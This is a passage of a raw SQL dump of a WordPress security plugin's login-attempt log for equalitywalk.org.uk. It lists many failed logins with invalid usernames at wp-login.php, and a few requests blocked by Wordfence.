Firefox/62.0','loginFailValidUsername',NULL,NULL),(6324,0.000000,1629465825.653857,'\0\0\0\0\0\0\0\0\0\0��)!��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6325,0.000000,1629465828.762412,'\0\0\0\0\0\0\0\0\0\0��)!��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6326,0.000000,1629465832.211349,'\0\0\0\0\0\0\0\0\0\0��)!��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6327,0.000000,1629465845.719224,'\0\0\0\0\0\0\0\0\0\0��NR�C',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6328,0.000000,1629465848.890951,'\0\0\0\0\0\0\0\0\0\0��NR�C',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6329,0.000000,1629465852.558366,'\0\0\0\0\0\0\0\0\0\0��NR�C',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6330,0.000000,1629465867.172678,'\0\0\0\0\0\0\0\0\0\0��|z�\n',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6331,0.000000,1629465872.031941,'\0\0\0\0\0\0\0\0\0\0��|z�\n',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6332,0.000000,1629465903.848425,'\0\0\0\0\0\0\0\0\0\0���`�a',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6333,0.000000,1629465909.147179,'\0\0\0\0\0\0\0\0\0\0���`�a',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6334,0.000000,1629465923.044182,'\0\0\0\0\0\0\0\0\0\0��:N�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6335,0.000000,1629465928.226094,'\0\0\0\0\0\0\0\0\0\0��:N�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6336,0.000000,1629465932.706436,'\0\0\0\0\0\0\0\0\0\0��:N�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6337,0.000000,1629465957.801787,'\0\0\0\0\0\0\0\0\0\0��+��z',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6338,0.000000,1629465964.963372,'\0\0\0\0\0\0\0\0\0\0��:5',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6339,0.000000,1629465968.606438,'\0\0\0\0\0\0\0\0\0\0��:5',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6340,0.000000,1629465975.234745,'\0\0\0\0\0\0\0\0\0\0��:5',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6341,0.000000,1629465990.384524,'\0\0\0\0\0\0\0\0\0\0���[��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6342,0.000000,1629465993.722288,'\0\0\0\0\0\0\0\0\0\0���[��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6343,0.000000,1629465997.222105,'\0\0\0\0\0\0\0\0\0\0���[��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6344,0.000000,1629466010.326132,'\0\0\0\0\0\0\0\0\0\0���a�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6345,0.000000,1629466012.365800,'\0\0\0\0\0\0\0\0\0\0���a�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6346,0.000000,1629466023.361859,'\0\0\0\0\0\0\0\0\0\0���dݮ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6347,0.000000,1629466026.593505,'\0\0\0\0\0\0\0\0\0\0���dݮ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6348,0.000000,1629466029.719980,'\0\0\0\0\0\0\0\0\0\0���dݮ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6349,0.000000,1629466050.166470,'\0\0\0\0\0\0\0\0\0\0��|x�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6350,0.000000,1629466055.626421,'\0\0\0\0\0\0\0\0\0\0��|x�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6351,0.000000,1629466070.499679,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6352,0.000000,1629466072.858202,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6353,0.000000,1629466075.037763,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6354,0.000000,1629466086.779190,'\0\0\0\0\0\0\0\0\0\0��|y��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6355,0.000000,1629466090.333850,'\0\0\0\0\0\0\0\0\0\0��|y��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6356,0.000000,1629466094.795838,'\0\0\0\0\0\0\0\0\0\0��|y��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6357,0.000000,1629466107.587606,'\0\0\0\0\0\0\0\0\0\0��_�S�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6358,0.000000,1629466111.455695,'\0\0\0\0\0\0\0\0\0\0��_�S�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6359,0.000000,1629466127.666842,'\0\0\0\0\0\0\0\0\0\0���e�L',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6360,0.000000,1629466164.331791,'\0\0\0\0\0\0\0\0\0\0���J�V',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6361,0.000000,1629466169.954255,'\0\0\0\0\0\0\0\0\0\0���J�V',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6362,0.000000,1629466173.154512,'\0\0\0\0\0\0\0\0\0\0���J�V',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6363,0.000000,1629466189.189778,'\0\0\0\0\0\0\0\0\0\0��sr(i',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6364,0.000000,1629466192.281982,'\0\0\0\0\0\0\0\0\0\0��sr(i',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6365,0.000000,1629466194.884501,'\0\0\0\0\0\0\0\0\0\0��sr(i',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6366,0.000000,1629466214.538488,'\0\0\0\0\0\0\0\0\0\0��g�K�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6367,0.000000,1629466216.923276,'\0\0\0\0\0\0\0\0\0\0��g�K�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6368,0.000000,1629466222.274692,'\0\0\0\0\0\0\0\0\0\0��g�K�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6369,0.000000,1629466235.006272,'\0\0\0\0\0\0\0\0\0\0��\\|��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6370,0.000000,1629466240.746080,'\0\0\0\0\0\0\0\0\0\0��\\|��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6371,0.000000,1629466242.650895,'\0\0\0\0\0\0\0\0\0\0��\\|��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6372,0.000000,1629466275.679612,'\0\0\0\0\0\0\0\0\0\0���dWL',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6373,0.000000,1629466281.187973,'\0\0\0\0\0\0\0\0\0\0���dWL',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6374,0.000000,1629466322.948323,'\0\0\0\0\0\0\0\0\0\0���a	r',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6375,0.000000,1629466338.262656,'\0\0\0\0\0\0\0\0\0\0���aɩ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6376,0.000000,1629466341.062388,'\0\0\0\0\0\0\0\0\0\0���aɩ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6377,0.000000,1629466346.272287,'\0\0\0\0\0\0\0\0\0\0���aɩ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6378,0.000000,1629466348.334717,'\0\0\0\0\0\0\0\0\0\0���b�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6379,0.000000,1629466376.786308,'\0\0\0\0\0\0\0\0\0\0���`n�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6380,0.000000,1629466378.986233,'\0\0\0\0\0\0\0\0\0\0���`n�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6381,0.000000,1629466393.462255,'\0\0\0\0\0\0\0\0\0\0��|yU\r',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6382,0.000000,1629466396.506853,'\0\0\0\0\0\0\0\0\0\0��|yU\r',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6383,0.000000,1629466433.301251,'\0\0\0\0\0\0\0\0\0\0��n�؄',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6384,0.000000,1629466438.622634,'\0\0\0\0\0\0\0\0\0\0��n�؄',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6385,0.000000,1629466441.356489,'\0\0\0\0\0\0\0\0\0\0��n�؄',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6386,0.000000,1629466460.939078,'\0\0\0\0\0\0\0\0\0\0��:+�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6387,0.000000,1629466490.970172,'\0\0\0\0\0\0\0\0\0\0���s',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6388,0.000000,1629466508.154503,'\0\0\0\0\0\0\0\0\0\0���A��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6389,0.000000,1629466544.082289,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6390,0.000000,1629466563.526441,'\0\0\0\0\0\0\0\0\0\0���e�+',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6391,0.000000,1629466581.632162,'\0\0\0\0\0\0\0\0\0\0��sW�$',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6392,0.000000,1629466586.941505,'\0\0\0\0\0\0\0\0\0\0��sW�$',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6393,0.000000,1629466590.985584,'\0\0\0\0\0\0\0\0\0\0��sW�$',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6394,0.000000,1629466607.405706,'\0\0\0\0\0\0\0\0\0\0��|y\\�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6395,0.000000,1629466610.262467,'\0\0\0\0\0\0\0\0\0\0��|y\\�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6396,0.000000,1629466613.996158,'\0\0\0\0\0\0\0\0\0\0��|y\\�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6397,0.000000,1629466630.798806,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6398,0.000000,1629466633.644007,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6399,0.000000,1629466645.024731,'\0\0\0\0\0\0\0\0\0\0���a@�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6400,0.000000,1629466647.934715,'\0\0\0\0\0\0\0\0\0\0���a@�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6401,0.000000,1629466650.608905,'\0\0\0\0\0\0\0\0\0\0���a@�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6402,0.000000,1629466712.037158,'\0\0\0\0\0\0\0\0\0\0����h',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6403,0.000000,1629466718.067075,'\0\0\0\0\0\0\0\0\0\0����h',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6404,0.000000,1629466732.215041,'\0\0\0\0\0\0\0\0\0\0���e�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6405,0.000000,1629466735.365174,'\0\0\0\0\0\0\0\0\0\0���e�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6406,0.000000,1629466738.699347,'\0\0\0\0\0\0\0\0\0\0���e�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6407,0.000000,1629466752.399480,'\0\0\0\0\0\0\0\0\0\0��R��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6408,0.000000,1629466755.660333,'\0\0\0\0\0\0\0\0\0\0��R��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6409,0.000000,1629466774.482690,'\0\0\0\0\0\0\0\0\0\0���>�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6410,0.000000,1629466803.725663,'\0\0\0\0\0\0\0\0\0\0��:�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6411,0.000000,1629466808.367054,'\0\0\0\0\0\0\0\0\0\0��:�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6412,0.000000,1629466811.674039,'\0\0\0\0\0\0\0\0\0\0��:�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6413,0.000000,1629466831.616925,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6414,0.000000,1629466860.313714,'\0\0\0\0\0\0\0\0\0\0��|ym�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6415,0.000000,1629466863.179664,'\0\0\0\0\0\0\0\0\0\0��|ym�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 